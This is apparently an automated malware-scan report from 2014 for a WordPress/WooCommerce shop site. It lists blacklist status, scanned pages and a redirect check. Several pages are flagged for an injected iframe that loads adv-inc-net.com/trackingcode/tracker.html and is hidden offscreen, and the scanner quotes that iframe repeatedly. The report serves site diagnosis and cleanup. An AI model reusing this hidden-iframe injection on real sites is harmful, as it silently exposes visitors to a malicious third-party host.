Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=test.dahuibali.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://test.dahuibali.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://test.dahuibali.com/ | 200 OK Content-Length: 48482 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[54686 bytes skipped]... t;script type='text/javascript'> /* <![CDATA[ */ var woocommerce_price_slider_params = {"currency_symbol":"\u00a3","currency_pos":"left","min_price":"","max_price":""}; /* ]]> */ </script> <script type='text/javascript' src='http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/price_slider.min.js?ver=1.0'></script> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://test.dahuibali.com/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/themes/dashop/js/projekktor/projekktor.min.js?ver=1 | 200 OK Content-Length: 94058 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/themes/dashop/js/avia.js?ver=1 | 200 OK Content-Length: 67185 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/themes/dashop/config-woocommerce/woocommerce-mod.js?ver=1 | 200 OK Content-Length: 20028 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/themes/dashop/js/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.0.1 | 200 OK Content-Length: 24867 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/themes/dashop/js/adaptavia.js?ver=1.0.0 | 200 OK Content-Length: 30808 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/woocommerce.min.js?ver=1.0 | 200 OK Content-Length: 24777 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/jquery-ui.min.js?ver=1.0 | 200 OK Content-Length: 19656 Content-Type: application/javascript | clean |
http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/price_slider.min.js?ver=1.0 | 200 OK Content-Length: 2183 Content-Type: application/javascript | clean |
http://test.dahuibali.com/?page_id=315 | 200 OK Content-Length: 38629 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[42341 bytes skipped]... t;script type='text/javascript'> /* <![CDATA[ */ var woocommerce_price_slider_params = {"currency_symbol":"\u00a3","currency_pos":"left","min_price":"","max_price":""}; /* ]]> */ </script> <script type='text/javascript' src='http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/price_slider.min.js?ver=1.0'></script> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://test.dahuibali.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://test.dahuibali.com/?page_id=318 | 200 OK Content-Length: 37819 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[41857 bytes skipped]... t;script type='text/javascript'> /* <![CDATA[ */ var woocommerce_price_slider_params = {"currency_symbol":"\u00a3","currency_pos":"left","min_price":"","max_price":""}; /* ]]> */ </script> <script type='text/javascript' src='http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/price_slider.min.js?ver=1.0'></script> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> | ||
http://test.dahuibali.com/?page_id=316 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 09 May 2014 05:29:28 GMT Pragma: no-cache Location: http://test.dahuibali.com/?page_id=315 Server: LiteSpeed Content-Length: 6153 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=83f893ced11bbef02ddeedf089e338d9; path=/ Set-Cookie: woocommerce_items_in_cart=0; expires=Fri, 09-May-2014 04:29:28 GMT; path=/ X-Pingback: http://test.dahuibali.com/xmlrpc.php X-Powered-By: PHP/5.3.28 | clean |
http://test.dahuibali.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
http://test.dahuibali.com/?page_id=507 | 200 OK Content-Length: 39509 Content-Type: text/html | malicious |
Page code contains blacklisted domain: adv-inc-net.com ...[43689 bytes skipped]... t;script type='text/javascript'> /* <![CDATA[ */ var woocommerce_price_slider_params = {"currency_symbol":"\u00a3","currency_pos":"left","min_price":"","max_price":""}; /* ]]> */ </script> <script type='text/javascript' src='http://test.dahuibali.com/wp-content/plugins/woocommerce/assets/js/price_slider.min.js?ver=1.0'></script> </body> </html> <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> Malicious iFrame found. size: 640x480 src: http://adv-inc-net.com/trackingcode/tracker.html This URL is marked by Google as suspicious <iframe src='http://adv-inc-net.com/trackingcode/tracker.html' width=640 height=480 style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: test.dahuibali.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 09 May 2014 05:29:07 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1ba980350e12a9dbbde78620e3b10b13; path=/
Set-Cookie: woocommerce_items_in_cart=0; expires=Fri, 09-May-2014 04:29:07 GMT; path=/
X-Pingback: http://test.dahuibali.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: test.dahuibali.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 09 May 2014 05:29:07 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=1ba980350e12a9dbbde78620e3b10b13; path=/
Set-Cookie: woocommerce_items_in_cart=0; expires=Fri, 09-May-2014 04:29:07 GMT; path=/
X-Pingback: http://test.dahuibali.com/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: test.dahuibali.com
Referer: http://www.google.com/search?q=test.dahuibali.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: test.dahuibali.com
Referer: http://www.google.com/search?q=test.dahuibali.com
Result:
The result is similar to the first query. There are no suspicious redirects found.